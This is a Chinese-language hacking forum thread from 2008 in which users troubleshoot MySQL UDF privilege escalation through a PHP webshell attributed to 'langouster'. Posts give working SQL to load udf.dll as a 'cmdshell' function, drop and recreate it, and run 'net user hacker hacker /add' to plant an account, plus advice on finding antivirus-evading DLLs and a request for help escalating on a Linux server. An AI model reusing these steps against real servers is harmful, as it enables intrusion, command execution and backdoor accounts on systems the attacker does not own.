Board logo

标题: [讨论]langouster的mysql提权马问题! [打印本页]
作者: richy    时间: 2008-7-21 00:20     标题: [讨论]langouster的mysql提权马问题!

[讨论]langouster的mysql提权马问题!
langouster的那个提权的PHP马 我第一次提权成功了 在系统上加了用户


后来因为丢了权限 就回去重新加,但原来的udf.dll文件存在了`好像不能被覆盖了。

我用Create Function cmdshell returns string soname "udf.dll"

提示:Function 'cmdshell' already exist 功能cmdshell存在? 但我进数据库已经把那个表删除了的


啊!!!既然存在,那我就去执行 select cmdshell('net user')

但不成功提示:You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '('net user')' at line 1

大虾门看看怎么回事```
帖子1 精华0 积分-6 阅读权限1 在线时间13 小时 注册时间2007-3-8 最后登录2008-4-20 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味


ring04h
团队执行官
作者: 洪记    时间: 2008-7-21 00:20

SQL语法错误
帖子3923 精华128 积分209640 阅读权限200 性别男 在线时间1095 小时 注册时间2007-10-23 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 软件项目外包

第四维
晶莹剔透§烈日灼然
作者: 土人    时间: 2008-7-21 00:20

select cmdshell('net user')
  有这样的SQL语句 select可以这样用吗?
帖子5 精华0 积分20 阅读权限40 性别男 在线时间3 小时 注册时间2007-1-11 最后登录2007-8-18 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

优格
荣誉会员
作者: 闲云    时间: 2008-7-21 00:20

后面应该还要个;
帖子226 精华2 积分796 阅读权限100 性别男 在线时间123 小时 注册时间2005-5-29 最后登录2008-4-16 查看详细资料引用 报告 回复 TOP

jackchenlei
晶莹剔透§烈日灼然
作者: 老猫    时间: 2008-7-21 00:20

删除存储过程cmdshell再添加一次
drop function cmdshell;
Create Function cmdshell returns string soname 'udf.dll';
帖子22 精华0 积分71 阅读权限40 性别男 在线时间229 小时 注册时间2006-5-2 最后登录2008-7-4 查看详细资料引用 报告 回复 TOP 软件项目外包

jackchenlei
晶莹剔透§烈日灼然
作者: listenbreeze    时间: 2008-7-21 00:20

引用:
引用第4楼jackchenlei于2007-08-19 21:05发表的 :
可能因为你上次提权后没有删除功能函数
删除功能函数cmdshell后再添加一次
drop function cmdshell;
Create Function cmdshell returns string soname 'udf.dll';
帖子22 精华0 积分71 阅读权限40 性别男 在线时间229 小时 注册时间2006-5-2 最后登录2008-7-4 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

fatcat
晶莹剔透§烈日灼然
作者: 44447777kun    时间: 2008-7-21 00:20

我也遇到了,奇怪的错误! 怀疑dll被查杀了
数据库查讯出错,请检查SQL语句Create Function cmdshell returns string soname 'udf.dll';的语法是否正确。Can't open shared library 'udf.dll' (errno: 0 )晕啊晕
帖子45 精华0 积分145 阅读权限40 性别男 来自浙江 在线时间68 小时 注册时间2004-11-9 最后登录2008-7-2 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

laidogdog
晶莹剔透§烈日灼然
作者: 长弓玉    时间: 2008-7-21 00:20

被杀了。
帖子1 精华0 积分6 阅读权限40 在线时间2 小时 注册时间2005-9-2 最后登录2007-12-14 查看详细资料引用 报告 回复 TOP

paradise12
晶莹剔透§烈日灼然
作者: 神童    时间: 2008-7-21 00:20

用UDF提权时开始倒入时无法显示该业然后就是错误:创建临时表Temp_Tab出错。Table 'temp_tab' already exists删除后再来还是一样的情况 请问有什么好的办法吗? ROOT权限...  大象大象~~~~
帖子3 精华0 积分13 阅读权限40 在线时间2 小时 注册时间2007-12-6 最后登录2007-12-6 查看详细资料引用 报告 回复 TOP

icedoing
晶莹剔透§烈日灼然
作者: niufen    时间: 2008-7-21 00:20

语法问题
帖子5 精华0 积分20 阅读权限40 在线时间0 小时 注册时间2007-7-28 最后登录2007-12-7 查看详细资料引用 报告 回复 TOP

paradise12
晶莹剔透§烈日灼然
作者: 牛屎仔    时间: 2008-7-21 00:20

请楼上高人说详细点好不...
帖子3 精华0 积分13 阅读权限40 在线时间2 小时 注册时间2007-12-6 最后登录2007-12-6 查看详细资料引用 报告 回复 TOP

paradise12
晶莹剔透§烈日灼然
作者: claire87    时间: 2008-7-21 00:20

可以的话加我Q292415227谢谢
帖子3 精华0 积分13 阅读权限40 在线时间2 小时 注册时间2007-12-6 最后登录2007-12-6 查看详细资料引用 报告 回复 TOP

咖啡爱可可
晶莹剔透§烈日灼然
作者: jimmy    时间: 2008-7-21 00:20

````LINUX哪位提权会的啊
uname -r 2.4.21-27.ELsmp
有目录浏览权限 怎么提权哪位知道告知下

装了MYSQL (有root密码)
    Zend
    PHP 4.4.2
    Apache 2.0 Handler
开放SSH
帖子6 精华0 积分18 阅读权限40 在线时间9 小时 注册时间2007-6-15 最后登录2008-7-1 查看详细资料引用 报告 回复 TOP

cser
晶莹剔透§烈日灼然
作者: 6G150    时间: 2008-7-21 00:20

;
楼主的sql语句最后没有加 ; 这个,显示的是不完整的sql语句。
select cmdshell('net user hacker hacker /add');
这样的没问题。
帖子2 精华0 积分9 阅读权限40 在线时间19 小时 注册时间2006-3-12 最后登录2008-5-4 查看详细资料引用 报告 回复 TOP

不止牛嘿
晶莹剔透§烈日灼然
作者: 珉头    时间: 2008-7-21 00:20

cmdshell('net user')        

Shell无法启动,GetLastError=Shell无法启动,GetLastError=Shell无法启动,GetLastError=Shell无法启动,GetLast
        
-----------------------------------

执行cmdshell的时候遇到这个.不知道什么原因..

帖子12 精华0 积分37 阅读权限40 性别男 在线时间38 小时 注册时间2007-4-15 最后登录2008-7-16 查看详细资料引用 报告 回复 TOP

greyair
晶莹剔透§烈日灼然
作者: topboy2000    时间: 2008-7-21 00:20

楼上的Shell无法启动是cmd被删或者system的使用权限被删。
帖子14 精华0 积分40 阅读权限40 在线时间83 小时 注册时间2007-3-12 最后登录2008-6-25 查看详细资料引用 报告 回复 TOP

wudi123
晶莹剔透§烈日灼然
作者: 姑爺囝    时间: 2008-7-21 00:20

cmdshell('net user')        

Shell无法启动,GetLastError=Shell无法启动,GetLastError=Shell无法启动,GetLastError=Shell无法启动,GetLast

我也遇到这问题 ,有没有解决办法呢?请教.
帖子1 精华0 积分3 阅读权限40 在线时间16 小时 注册时间2007-12-18 最后登录2008-7-8 查看详细资料引用 报告 回复 TOP

pwangeng
晶莹剔透§烈日灼然
作者: 赛车手    时间: 2008-7-21 00:20

导出到c:\windows\udf.dll 成功

执行create function cmdshell returns string soname 'udf.dll' 出错

数据库查讯出错,请检查SQL语句create function cmdshell returns string soname 'udf.dll'的语法是否正确。Can't open shared library 'udf.dll' (errno: 0 )

这是什么原因?
帖子7 精华0 积分7 阅读权限40 在线时间6 小时 注册时间2008-5-7 最后登录2008-7-15 查看详细资料引用 报告 回复 TOP

pwangeng
晶莹剔透§烈日灼然
作者: 泰兴行    时间: 2008-7-21 00:20

如果是udf.dll被查杀,那该怎么办?
帖子7 精华0 积分7 阅读权限40 在线时间6 小时 注册时间2008-5-7 最后登录2008-7-15 查看详细资料引用 报告 回复 TOP

yumiko
晶莹剔透§烈日灼然
作者: 强劲力量    时间: 2008-7-21 00:20

寻找免杀的UDF.DLL
帖子5 精华0 积分32 阅读权限40 在线时间7 小时 注册时间2006-5-16 最后登录2008-7-19 查看详细资料引用 报告 回复 TOP

zm94
晶莹剔透§烈日灼然



欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com/) Powered by Discuz! 7.2